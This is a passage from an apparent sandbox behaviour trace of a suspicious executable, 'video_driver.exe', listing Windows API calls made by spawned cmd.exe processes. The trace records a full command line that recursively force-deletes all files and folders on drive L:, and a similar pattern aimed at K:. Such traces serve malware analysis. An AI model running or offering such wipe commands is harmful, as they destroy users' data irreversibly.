lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0067.736] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0067.738] GetProcessHeap () returned 0x310000 [0067.738] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x0, Size=0x20c) returned 0x322ef8 [0067.738] GetConsoleTitleW (in: lpConsoleTitle=0x322ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0067.738] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0067.738] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0067.738] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0067.738] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0067.739] GetProcessHeap () returned 0x310000 [0067.739] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x400a) returned 0x326ae0 [0067.739] GetProcessHeap () returned 0x310000 [0067.739] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x4008) returned 0x32aaf8 [0067.739] GetProcessHeap () returned 0x310000 [0067.739] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x1a) returned 0x3257e0 [0067.739] GetEnvironmentVariableW (in: lpName="p IN (\"K", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.739] _wcsicmp (_String1="p IN (\"K", _String2="CD") returned 13 [0067.739] _wcsicmp (_String1="p IN (\"K", _String2="ERRORLEVEL") returned 11 [0067.740] _wcsicmp (_String1="p IN (\"K", _String2="CMDEXTVERSION") returned 13 [0067.740] _wcsicmp (_String1="p IN (\"K", _String2="CMDCMDLINE") returned 13 [0067.740] _wcsicmp (_String1="p IN (\"K", _String2="DATE") returned 12 [0067.740] _wcsicmp (_String1="p IN (\"K", _String2="TIME") returned -4 [0067.740] _wcsicmp (_String1="p IN (\"K", _String2="RANDOM") returned -2 [0067.740] _wcsicmp (_String1="p IN (\"K", _String2="HIGHESTNUMANODENUMBER") returned 8 [0067.740] GetProcessHeap () returned 0x310000 [0067.740] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x3257e0 | out: hHeap=0x310000) returned 1 [0067.740] GetProcessHeap () returned 0x310000 [0067.740] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32aaf8 | out: hHeap=0x310000) returned 1 [0067.740] GetProcessHeap () returned 0x310000 [0067.740] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x4008) returned 0x32aaf8 [0067.740] GetProcessHeap () returned 0x310000 [0067.740] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x32aaf8 | out: hHeap=0x310000) returned 1 [0067.740] GetProcessHeap () returned 0x310000 [0067.740] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x326ae0 | out: hHeap=0x310000) returned 1 [0067.741] _wcsicmp (_String1="if", _String2=")") returned 64 [0067.741] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0067.741] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0067.741] _wcsicmp (_String1="IF", _String2="if") returned 0 [0067.741] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0067.741] GetProcessHeap () returned 0x310000 [0067.741] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x58) returned 0x323110 [0067.741] GetProcessHeap () returned 0x310000 [0067.741] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xe) returned 0x31ffc0 [0067.741] GetProcessHeap () returned 0x310000 [0067.741] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x20) returned 0x3257e0 [0067.742] GetProcessHeap () returned 0x310000 [0067.742] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x3257e0, Size=0x16) returned 0x321800 [0067.742] GetProcessHeap () returned 0x310000 [0067.742] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x321800) returned 0x16 [0067.742] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0067.743] GetProcessHeap () returned 0x310000 [0067.743] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x58) returned 0x323170 [0067.743] GetProcessHeap () returned 0x310000 [0067.743] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x14) returned 0x3231d0 [0067.743] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0067.743] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0067.743] GetProcessHeap () returned 0x310000 [0067.743] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x12) returned 0x3231f0 [0067.743] GetProcessHeap () returned 0x310000 [0067.743] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x1c) returned 0x3257e0 [0067.743] GetProcessHeap () returned 0x310000 [0067.744] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x3257e0, Size=0x14) returned 0x323210 [0067.744] GetProcessHeap () returned 0x310000 [0067.744] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x323210) returned 0x14 [0067.744] _wcsicmp (_String1="del", _String2=")") returned 59 [0067.744] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0067.744] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0067.744] _wcsicmp (_String1="IF", _String2="del") returned 5 [0067.744] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0067.744] _wcsicmp (_String1="REM", _String2="del") returned 14 [0067.744] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0067.744] GetProcessHeap () returned 0x310000 [0067.744] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x58) returned 0x323230 [0067.744] GetProcessHeap () returned 0x310000 [0067.744] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x10) returned 0x31ffd8 [0067.746] GetProcessHeap () returned 0x310000 [0067.746] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x28) returned 0x323290 [0067.747] GetProcessHeap () returned 0x310000 [0067.747] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x58) returned 0x3232c0 [0067.747] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0067.747] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0067.747] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0067.747] GetProcessHeap () returned 0x310000 [0067.747] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x58) returned 0x323320 [0067.747] GetProcessHeap () returned 0x310000 [0067.747] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x44) returned 0x323380 [0067.748] GetProcessHeap () returned 0x310000 [0067.748] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x14) returned 0x3233d0 [0067.748] GetProcessHeap () returned 0x310000 [0067.748] RtlReAllocateHeap (Heap=0x310000, Flags=0x0, Ptr=0x3233d0, Size=0x12) returned 0x3233d0 [0067.748] GetProcessHeap () returned 0x310000 [0067.748] RtlSizeHeap (HeapHandle=0x310000, Flags=0x0, MemoryPointer=0x3233d0) returned 0x12 [0067.748] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0067.748] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0067.749] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0067.749] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0067.749] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0067.749] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0067.749] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0067.750] GetProcessHeap () returned 0x310000 [0067.750] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x12) returned 0x3233f0 [0067.750] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0067.751] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0067.751] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0067.751] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0067.751] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0067.751] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0067.751] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0067.751] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0067.751] GetProcessHeap () returned 0x310000 [0067.751] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x58) returned 0x323410 [0067.751] GetProcessHeap () returned 0x310000 [0067.751] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x14) returned 0x323470 [0067.751] GetProcessHeap () returned 0x310000 [0067.751] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x20) returned 0x3257e0 [0067.753] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0067.754] GetFullPathNameW (in: lpFileName="K:", nBufferLength=0x208, lpBuffer=0x2ef910, lpFilePart=0x2ef6bc | out: lpBuffer="K:\\", lpFilePart=0x2ef6bc*=0x0) returned 0x3 [0067.755] wcsncmp (_String1="K:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -17 [0067.760] GetFileAttributesW (lpFileName="K:\\" (normalized: "k:")) returned 0xffffffff [0067.760] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.760] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0067.765] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.765] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0067.766] _get_osfhandle (_FileHandle=0) returned 0x3 [0067.766] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0067.766] SetConsoleInputExeNameW () returned 0x1 [0067.766] GetConsoleOutputCP () returned 0x1b5 [0067.766] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.766] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.766] exit (_Code=0) Process: id = "56" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x42277000" os_pid = "0xa98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"L:\" del /f /s /q \"L:\" & FOR /D %p IN (\"L:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 84 os_tid = 0x7b4 [0067.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ffb4c | out: lpSystemTimeAsFileTime=0x2ffb4c*(dwLowDateTime=0x6443e80, dwHighDateTime=0x1d62400)) [0067.875] GetCurrentProcessId () returned 0xa98 [0067.875] GetCurrentThreadId () returned 0x7b4 [0067.875] GetTickCount () returned 0x1148640 [0067.875] QueryPerformanceCounter (in: lpPerformanceCount=0x2ffb44 | out: lpPerformanceCount=0x2ffb44*=18800886770) returned 1 [0067.877] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0067.877] __set_app_type (_Type=0x1) [0067.877] __p__fmode () returned 0x770331f4 [0067.877] __p__commode () returned 0x770331fc [0067.877] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0067.878] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0067.878] GetCurrentThreadId () returned 0x7b4 [0067.878] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7b4) returned 0x60 [0067.878] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0067.878] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0067.878] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.879] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0067.879] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ffadc | out: phkResult=0x2ffadc*=0x0) returned 0x2 [0067.879] VirtualQuery (in: lpAddress=0x2ffb13, lpBuffer=0x2ffaac, dwLength=0x1c | out: lpBuffer=0x2ffaac*(BaseAddress=0x2ff000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.879] VirtualQuery (in: lpAddress=0x200000, lpBuffer=0x2ffaac, dwLength=0x1c | out: lpBuffer=0x2ffaac*(BaseAddress=0x200000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0067.879] VirtualQuery (in: lpAddress=0x201000, lpBuffer=0x2ffaac, dwLength=0x1c | out: lpBuffer=0x2ffaac*(BaseAddress=0x201000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0067.880] VirtualQuery (in: lpAddress=0x203000, lpBuffer=0x2ffaac, dwLength=0x1c | out: lpBuffer=0x2ffaac*(BaseAddress=0x203000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.880] VirtualQuery (in: lpAddress=0x300000, lpBuffer=0x2ffaac, dwLength=0x1c | out: lpBuffer=0x2ffaac*(BaseAddress=0x300000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0067.880] GetConsoleOutputCP () returned 0x1b5 [0067.880] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.880] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0067.880] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.880] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0067.881] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.881] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0067.881] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.881] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0067.881] _get_osfhandle (_FileHandle=0) returned 0x3 [0067.881] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0067.881] GetEnvironmentStringsW () returned 0x3920f8* [0067.881] GetProcessHeap () returned 0x380000 [0067.882] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xaca) returned 0x392bd0 [0067.882] FreeEnvironmentStringsW (penv=0x3920f8) returned 1 [0067.882] GetProcessHeap () returned 0x380000 [0067.882] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x4) returned 0x391898 [0067.882] GetEnvironmentStringsW () returned 0x3920f8* [0067.882] GetProcessHeap () returned 0x380000 [0067.882] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xaca) returned 0x3936a8 [0067.882] FreeEnvironmentStringsW (penv=0x3920f8) returned 1 [0067.882] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2fea4c | out: phkResult=0x2fea4c*=0x68) returned 0x0 [0067.882] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2fea54, lpData=0x2fea58, lpcbData=0x2fea50*=0x1000 | out: lpType=0x2fea54*=0x0, lpData=0x2fea58*=0x0, lpcbData=0x2fea50*=0x1000) returned 0x2 [0067.883] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2fea54, lpData=0x2fea58, lpcbData=0x2fea50*=0x1000 | out: lpType=0x2fea54*=0x4, lpData=0x2fea58*=0x1, lpcbData=0x2fea50*=0x4) returned 0x0 [0067.883] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2fea54, lpData=0x2fea58, lpcbData=0x2fea50*=0x1000 | out: lpType=0x2fea54*=0x0, lpData=0x2fea58*=0x1, lpcbData=0x2fea50*=0x1000) returned 0x2 [0067.883] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2fea54, lpData=0x2fea58, lpcbData=0x2fea50*=0x1000 | out: lpType=0x2fea54*=0x4, lpData=0x2fea58*=0x0, lpcbData=0x2fea50*=0x4) returned 0x0 [0067.883] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2fea54, lpData=0x2fea58, lpcbData=0x2fea50*=0x1000 | out: lpType=0x2fea54*=0x4, lpData=0x2fea58*=0x40, lpcbData=0x2fea50*=0x4) returned 0x0 [0067.883] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2fea54, lpData=0x2fea58, lpcbData=0x2fea50*=0x1000 | out: lpType=0x2fea54*=0x4, lpData=0x2fea58*=0x40, lpcbData=0x2fea50*=0x4) returned 0x0 [0067.883] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2fea54, lpData=0x2fea58, lpcbData=0x2fea50*=0x1000 | out: lpType=0x2fea54*=0x0, lpData=0x2fea58*=0x40, lpcbData=0x2fea50*=0x1000) returned 0x2 [0067.883] RegCloseKey (hKey=0x68) returned 0x0 [0067.883] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2fea4c | out: phkResult=0x2fea4c*=0x68) returned 0x0 [0067.883] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2fea54, lpData=0x2fea58, lpcbData=0x2fea50*=0x1000 | out: lpType=0x2fea54*=0x0, lpData=0x2fea58*=0x40, lpcbData=0x2fea50*=0x1000) returned 0x2 [0067.883] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2fea54, lpData=0x2fea58, lpcbData=0x2fea50*=0x1000 | out: lpType=0x2fea54*=0x4, lpData=0x2fea58*=0x1, lpcbData=0x2fea50*=0x4) returned 0x0 [0067.883] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2fea54, lpData=0x2fea58, lpcbData=0x2fea50*=0x1000 | out: lpType=0x2fea54*=0x0, lpData=0x2fea58*=0x1, lpcbData=0x2fea50*=0x1000) returned 0x2 [0067.883] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2fea54, lpData=0x2fea58, lpcbData=0x2fea50*=0x1000 | out: lpType=0x2fea54*=0x4, lpData=0x2fea58*=0x0, lpcbData=0x2fea50*=0x4) returned 0x0 [0067.883] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2fea54, lpData=0x2fea58, lpcbData=0x2fea50*=0x1000 | out: lpType=0x2fea54*=0x4, lpData=0x2fea58*=0x9, lpcbData=0x2fea50*=0x4) returned 0x0 [0067.883] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2fea54, lpData=0x2fea58, lpcbData=0x2fea50*=0x1000 | out: lpType=0x2fea54*=0x4, lpData=0x2fea58*=0x9, lpcbData=0x2fea50*=0x4) returned 0x0 [0067.884] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2fea54, lpData=0x2fea58, lpcbData=0x2fea50*=0x1000 | out: lpType=0x2fea54*=0x0, lpData=0x2fea58*=0x9, lpcbData=0x2fea50*=0x1000) returned 0x2 [0067.884] RegCloseKey (hKey=0x68) returned 0x0 [0067.884] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6d [0067.884] srand (_Seed=0x5eb34b6d) [0067.884] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"L:\" del /f /s /q \"L:\" & FOR /D %p IN (\"L:\") DO rmdir \"%p\" /s /q" [0067.884] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"L:\" del /f /s /q \"L:\" & FOR /D %p IN (\"L:\") DO rmdir \"%p\" /s /q" [0067.884] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.884] GetProcessHeap () returned 0x380000 [0067.884] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x210) returned 0x3920f8 [0067.884] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x392100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0067.885] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0067.885] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0067.885] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.885] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0067.885] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0067.885] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0067.885] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0067.885] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0067.885] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0067.885] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0067.885] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0067.887] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0067.887] GetProcessHeap () returned 0x380000 [0067.887] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x392bd0 | out: hHeap=0x380000) returned 1 [0067.887] GetEnvironmentStringsW () returned 0x392310* [0067.887] GetProcessHeap () returned 0x380000 [0067.887] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xae2) returned 0x394c70 [0067.887] FreeEnvironmentStringsW (penv=0x392310) returned 1 [0067.887] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0067.887] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.887] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0067.887] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0067.887] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0067.887] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0067.887] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0067.887] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0067.887] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0067.887] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0067.887] GetProcessHeap () returned 0x380000 [0067.888] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x54) returned 0x3917c8 [0067.888] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ff818 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.888] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2ff818, lpFilePart=0x2ff814 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ff814*="Desktop") returned 0x25 [0067.888] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0067.888] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ff594 | out: lpFindFileData=0x2ff594*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x395760 [0067.888] FindClose (in: hFindFile=0x395760 | out: hFindFile=0x395760) returned 1 [0067.888] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ff594 | out: lpFindFileData=0x2ff594*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x395760 [0067.888] FindClose (in: hFindFile=0x395760 | out: hFindFile=0x395760) returned 1 [0067.889] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0067.889] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ff594 | out: lpFindFileData=0x2ff594*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x395760 [0067.889] FindClose (in: hFindFile=0x395760 | out: hFindFile=0x395760) returned 1 [0067.889] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0067.889] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0067.889] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0067.889] GetProcessHeap () returned 0x380000 [0067.889] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x394c70 | out: hHeap=0x380000) returned 1 [0067.889] GetEnvironmentStringsW () returned 0x394180* [0067.890] GetProcessHeap () returned 0x380000 [0067.890] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xb36) returned 0x395fa0 [0067.890] FreeEnvironmentStringsW (penv=0x394180) returned 1 [0067.890] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.890] GetProcessHeap () returned 0x380000 [0067.890] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x3917c8 | out: hHeap=0x380000) returned 1 [0067.890] GetProcessHeap () returned 0x380000 [0067.890] RtlAllocateHeap (HeapHandle=0x380000, 